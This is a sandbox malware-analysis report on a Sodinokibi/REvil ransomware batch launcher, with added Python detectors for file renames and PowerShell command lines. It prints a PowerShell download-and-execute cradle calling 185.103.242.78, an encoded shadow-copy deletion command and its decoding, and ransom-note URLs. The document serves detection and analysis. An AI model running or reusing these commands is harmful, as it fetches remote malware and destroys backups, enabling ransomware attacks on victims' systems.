Analysis
max time kernel: 137s
max time network: 66s
platform: windows7_x64
resource: win7v200722
submitted: 13-08-2020 14:10
Static task: static1
Behavioral task: behavioral1
  Sample: f273d69e572f51a031e40b8c83f3e58b.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: f273d69e572f51a031e40b8c83f3e58b.bat
  Resource: win10
General
Target: f273d69e572f51a031e40b8c83f3e58b.bat
Size: 222B
MD5: 8609a1469584fe2c96aa61c898fd08e2
SHA1: 184957747a301ae172a76046daf5480c525a55db
SHA256: add2d6d1bb4a21cb6e1b3266aea269d4e66dbd7999ef070b81760cc64d547bac
SHA512: 2192354833c5c0c07ad79980769ef1090d7232717f9c73c13f16b4558593a9eb3028818dbc564433a41bfc3f092ea1a39cffccf0440a81dbc09ab8f5114162ec
Malware Config
Extracted (stage download URL, taken from the launcher's PowerShell command line; the path component is the same value as the sample's file name):
  http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b
Extracted (sodinokibi ransom note, C:\3333t-readme.txt; both the Tor and the clearnet decryptor.cc address carry the same 75209EA47D1D4065 identifier):
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/75209EA47D1D4065
  http://decryptor.cc/75209EA47D1D4065
Signatures
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoC)
  flow 3: PID 1040 powershell.exe
Modifies extensions of user files (9 IoCs)
  Ransomware generally changes the extension on encrypted files.
  powershell.exe:
    File renamed C:\Users\Admin\Pictures\RegisterDisconnect.tiff => \??\c:\users\admin\pictures\RegisterDisconnect.tiff.3333t
    File opened for modification \??\c:\users\admin\pictures\RegisterDisconnect.tiff
    File renamed C:\Users\Admin\Pictures\ApproveConvertFrom.crw => \??\c:\users\admin\pictures\ApproveConvertFrom.crw.3333t
    File renamed C:\Users\Admin\Pictures\DebugTest.tif => \??\c:\users\admin\pictures\DebugTest.tif.3333t
    File renamed C:\Users\Admin\Pictures\ExpandSearch.crw => \??\c:\users\admin\pictures\ExpandSearch.crw.3333t
    File renamed C:\Users\Admin\Pictures\ConvertFromFind.png => \??\c:\users\admin\pictures\ConvertFromFind.png.3333t
    File renamed C:\Users\Admin\Pictures\EditFind.crw => \??\c:\users\admin\pictures\EditFind.crw.3333t
    File renamed C:\Users\Admin\Pictures\ImportCompress.png => \??\c:\users\admin\pictures\ImportCompress.png.3333t
    File renamed C:\Users\Admin\Pictures\StopRegister.crw => \??\c:\users\admin\pictures\StopRegister.crw.3333t
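The rename pattern above (original name kept, one fixed suffix appended, the same note file dropped into several directories by the same process) is what a file-activity heuristic keys on. The following is an added example, not part of the sandbox report: it parses sandbox-style file events, groups them per process, and reports a process once it appends one suffix to enough distinct files. The powershell.exe events are copied from this report's signatures; the explorer.exe line is constructed as a benign rename for contrast, and the thresholds (min_renames, min_notes) are assumptions.

```python
"""Flag ransomware-style file activity in sandbox file events.

Added example; it is not part of the sandbox report. The powershell.exe
events are copied from the report's "Modifies extensions of user files" and
"Drops file in Program Files directory" signatures; the explorer.exe line is
constructed as a benign rename for contrast.
"""
import ntpath
import re
from collections import Counter, defaultdict

_RENAME = re.compile(r"^File renamed (.+?) => (.+?) (\S+\.exe)$", re.I)
_CREATE = re.compile(r"^File created (.+?) (\S+\.exe)$", re.I)


def _norm(path):
    # Drop the NT "\??\" prefix and fold case so both path forms compare equal.
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def appended_extension(old, new):
    """Return the suffix appended to `old` to form `new`, else None.

    Ransomware keeps the original name and appends its own suffix
    (RegisterDisconnect.tiff -> RegisterDisconnect.tiff.3333t); a normal
    rename replaces the name or the extension instead.
    """
    old_n, new_n = _norm(old), _norm(new)
    if not new_n.startswith(old_n + "."):
        return None
    suffix = new_n[len(old_n) + 1:]
    return suffix if suffix and "." not in suffix else None


def analyse_file_events(lines, min_renames=5, min_notes=2):
    """Report processes that append one suffix to many distinct files and drop
    the same note file (named after that suffix) in several directories."""
    stats = defaultdict(lambda: {"ext": Counter(), "files": set(), "created": Counter()})
    for line in lines:
        line = line.strip()
        m = _RENAME.match(line)
        if m:
            old, new, proc = m.groups()
            ext = appended_extension(old, new)
            if ext:
                stats[proc.lower()]["ext"][ext] += 1
                stats[proc.lower()]["files"].add(_norm(old))
            continue
        m = _CREATE.match(line)
        if m:
            path, proc = m.groups()
            stats[proc.lower()]["created"][ntpath.basename(_norm(path))] += 1
    findings = []
    for proc, st in stats.items():
        if not st["ext"] or len(st["files"]) < min_renames:
            continue
        ext, _ = st["ext"].most_common(1)[0]
        notes = sorted(n for n, c in st["created"].items() if ext in n and c >= min_notes)
        findings.append({"process": proc, "extension": ext,
                         "files": len(st["files"]), "ransom_notes": notes})
    return findings


SAMPLE_EVENTS = [
    # copied from the report (powershell.exe, PID 1040)
    r"File renamed C:\Users\Admin\Pictures\RegisterDisconnect.tiff => \??\c:\users\admin\pictures\RegisterDisconnect.tiff.3333t powershell.exe",
    r"File opened for modification \??\c:\users\admin\pictures\RegisterDisconnect.tiff powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ApproveConvertFrom.crw => \??\c:\users\admin\pictures\ApproveConvertFrom.crw.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\DebugTest.tif => \??\c:\users\admin\pictures\DebugTest.tif.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ExpandSearch.crw => \??\c:\users\admin\pictures\ExpandSearch.crw.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ConvertFromFind.png => \??\c:\users\admin\pictures\ConvertFromFind.png.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\EditFind.crw => \??\c:\users\admin\pictures\EditFind.crw.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\ImportCompress.png => \??\c:\users\admin\pictures\ImportCompress.png.3333t powershell.exe",
    r"File renamed C:\Users\Admin\Pictures\StopRegister.crw => \??\c:\users\admin\pictures\StopRegister.crw.3333t powershell.exe",
    r"File created \??\c:\program files\3333t-readme.txt powershell.exe",
    r"File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3333t-readme.txt powershell.exe",
    r"File created \??\c:\program files\microsoft sql server compact edition\3333t-readme.txt powershell.exe",
    r"File created \??\c:\program files (x86)\3333t-readme.txt powershell.exe",
    # constructed benign rename: the extension is replaced, not appended
    r"File renamed C:\Users\Admin\Documents\report.tmp => C:\Users\Admin\Documents\report.docx explorer.exe",
]

if __name__ == "__main__":
    for finding in analyse_file_events(SAMPLE_EVENTS):
        print(finding)
```

Run on the sample, the only finding is powershell.exe appending 3333t to 8 files and creating 3333t-readme.txt four times; explorer.exe's rename changes the extension rather than appending one, so it never enters the statistics. Counting distinct original paths rather than rename events keeps a process that renames one file back and forth from tripping the threshold.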
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
  vssvc.exe:
    Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
    Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
    Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
    Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Note: the Volume Shadow Copy service writes these Diag keys whenever it becomes active, so on their own they are not a malicious indicator. Here vssvc.exe (PID 1372) is active because the child powershell.exe (PID 1352) deletes every shadow copy through WMI; that deletion, not the registry writes, is the event to alert on.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  powershell.exe:
    Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fts503.bmp"
Drops file in Program Files directory (38 IoCs)
  powershell.exe:
    File opened for modification \??\c:\program files\NewPublish.aiff
    File opened for modification \??\c:\program files\ResolveSkip.mht
    File opened for modification \??\c:\program files\UnlockInstall.midi
    File created \??\c:\program files\3333t-readme.txt
    File opened for modification \??\c:\program files\ClearMerge.svgz
    File opened for modification \??\c:\program files\LockEnable.xla
    File opened for modification \??\c:\program files\LimitGroup.avi
    File opened for modification \??\c:\program files\LimitUnprotect.wm
    File opened for modification \??\c:\program files\MoveConvert.tiff
    File opened for modification \??\c:\program files\SyncComplete.wmx
    File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3333t-readme.txt
    File opened for modification \??\c:\program files\AddConvertTo.potx
    File opened for modification \??\c:\program files\ExpandOut.3g2
    File opened for modification \??\c:\program files\ImportExit.m3u
    File opened for modification \??\c:\program files\HideSend.wm
    File opened for modification \??\c:\program files\MergeDebug.clr
    File opened for modification \??\c:\program files\OpenConvertTo.xlsb
    File opened for modification \??\c:\program files\ResumeUnpublish.jpeg
    File opened for modification \??\c:\program files\ConvertResolve.emz
    File created \??\c:\program files\microsoft sql server compact edition\3333t-readme.txt
    File opened for modification \??\c:\program files\MountSave.wax
    File opened for modification \??\c:\program files\ReceiveClose.WTV
    File opened for modification \??\c:\program files\UnregisterRestore.mhtml
    File opened for modification \??\c:\program files\StepApprove.txt
    File opened for modification \??\c:\program files\ApproveSuspend.vsd
    File opened for modification \??\c:\program files\ConvertToSplit.i64
    File opened for modification \??\c:\program files\SplitExport.edrwx
    File opened for modification \??\c:\program files\ReceiveEnter.wpl
    File opened for modification \??\c:\program files\SaveWatch.vbe
    File opened for modification \??\c:\program files\SetSync.search-ms
    File opened for modification \??\c:\program files\StepOut.xlsx
    File opened for modification \??\c:\program files\TestAssert.pptm
    File created \??\c:\program files (x86)\3333t-readme.txt
    File opened for modification \??\c:\program files\CheckpointResize.xml
    File opened for modification \??\c:\program files\OpenMerge.contact
    File created \??\c:\program files\microsoft sql server compact edition\v3.5\3333t-readme.txt
    File opened for modification \??\c:\program files\FormatCompress.ttf
    File opened for modification \??\c:\program files\PushBackup.php
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 1040 powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 1040 powershell.exe (3 events)
  PID 1352 powershell.exe (2 events)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Token: SeDebugPrivilege 1040 powershell.exe (2 events)
  Token: SeDebugPrivilege 1352 powershell.exe
  Token: SeBackupPrivilege 1372 vssvc.exe
  Token: SeRestorePrivilege 1372 vssvc.exe
  Token: SeAuditPrivilege 1372 vssvc.exe
  Token: SeTakeOwnershipPrivilege 1040 powershell.exe
  Note: the vssvc.exe privileges are the ones the service normally enables. SeTakeOwnershipPrivilege on the encrypting process (PID 1040) is the interesting one: it lets the process take over files it does not own, which matches the writes under c:\program files above.
Suspicious use of WriteProcessMemory (8 IoCs)
  PID 748 cmd.exe wrote to memory of PID 1040 powershell.exe (4 events)
  PID 1040 powershell.exe wrote to memory of PID 1352 powershell.exe (4 events)
  Note: parent-to-child writes at process creation are also seen on benign launches; what is specific here is the chain cmd.exe -> powershell.exe -> powershell.exe.
Processes
- C:\Windows\system32\cmd.exe (PID 748)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\f273d69e572f51a031e40b8c83f3e58b.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1040)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b');Invoke-QEEAWDOACTLVWYR;Start-Sleep -s 10000"
    The 222-byte .bat is only a launcher: 32-bit (SysWOW64) PowerShell fetches the next stage from 185.103.242.78 over plain HTTP, evaluates it in memory with IEX without writing it to disk, calls Invoke-QEEAWDOACTLVWYR (a function the downloaded script has to define, since nothing else in the chain does), then sleeps for 10000 seconds, about 2.8 hours, to keep the host process alive.
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1352)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (-e is base64 over UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This deletes every Volume Shadow Copy through WMI so that previous file versions cannot be restored, and is what brings vssvc.exe (below) into the trace.
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 1372)
  C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
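The two PowerShell command lines in this tree are the parts of the chain a detection engineer would normalise before matching: the first is a download-and-execute cradle that parks the process with a long sleep, the second hides a shadow-copy deletion behind -EncodedCommand. The following is an added example, not part of the sandbox report and not the sample's own code: it decodes -EncodedCommand arguments (base64 over UTF-16LE, which is why a plain base64 decode shows NUL bytes between the characters) and tags the command line with the indicators the report's signatures describe. The two malicious command lines are copied from the process tree above; the benign line, its script path and the 600-second sleep threshold are assumptions.

```python
"""Decode and triage PowerShell command lines taken from a sandbox process tree.

Added example; it is not part of the sandbox report. The two malicious
command lines below are copied from the report's process tree (PIDs 1040
and 1352); the benign one is constructed for contrast.
"""
import base64
import binascii
import re

# A download cradle needs both a fetch primitive and an in-memory execute.
_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
_EXEC = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# Shadow-copy removal via WMI (as in this sample), vssadmin or wmic.
_SHADOW = re.compile(
    r"Win32_Shadowcopy.*?\.Delete\(|vssadmin(?:\.exe)?\s+delete\s+shadows"
    r"|wmic(?:\.exe)?\s+shadowcopy\s+delete",
    re.I | re.S,
)
_SLEEP = re.compile(r"Start-Sleep\s+-s(?:econds)?\s+(\d+)", re.I)
_URL = re.compile(r"""https?://[^\s'"()]+""", re.I)
# "-e", "-ec", "-enc", ...: powershell.exe accepts any unambiguous prefix of
# -EncodedCommand, so match "-e<letters>" and check the prefix afterwards.
_ENC_FLAG = re.compile(r"""(?:^|\s)-(e[a-z]*)\s+["']?([A-Za-z0-9+/=]+)""", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or invalid.

    The argument is base64 over UTF-16LE, not UTF-8; decoding it as UTF-8
    would leave a NUL after every character.
    """
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # -ExecutionPolicy, -ep and friends also start with "e"
        try:
            raw = base64.b64decode(blob, validate=True)
            if len(raw) % 2:
                return None  # not a whole number of UTF-16 code units
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def triage_powershell(cmdline):
    """Classify one powershell.exe command line and return the findings."""
    decoded = decode_encoded_command(cmdline)
    script = cmdline if decoded is None else decoded
    indicators = []
    if decoded is not None:
        indicators.append("encoded_command")
    if _DOWNLOAD.search(script) and _EXEC.search(script):
        indicators.append("download_cradle")
    if _SHADOW.search(script):
        indicators.append("shadow_copy_deletion")
    sleep = _SLEEP.search(script)
    if sleep and int(sleep.group(1)) >= 600:  # assumed threshold
        indicators.append("long_sleep_keepalive")  # parks the host process
    return {
        "decoded": decoded is not None,
        "script": script,
        "urls": _URL.findall(script),
        "indicators": indicators,
    }


# Copied from the report's process tree (PID 1040 and PID 1352).
CRADLE = (
    r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
    r'"IEX (New-Object System.Net.WebClient).DownloadString('
    r"'http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b');"
    r'Invoke-QEEAWDOACTLVWYR;Start-Sleep -s 10000"'
)
ENCODED = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)
# Constructed benign line for contrast (hypothetical script path).
BENIGN = r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"

if __name__ == "__main__":
    for line in (CRADLE, ENCODED, BENIGN):
        result = triage_powershell(line)
        print(result["indicators"], result["urls"])
        if result["decoded"]:
            print("  decoded:", result["script"])
```

The prefix check matters in practice: -ExecutionPolicy and -ep also start with "e", so a naive "-e" match would try to base64-decode "Bypass". Matching on the decoded script rather than the raw command line is what makes the shadow-copy rule fire for PID 1352, whose raw command line contains nothing but base64.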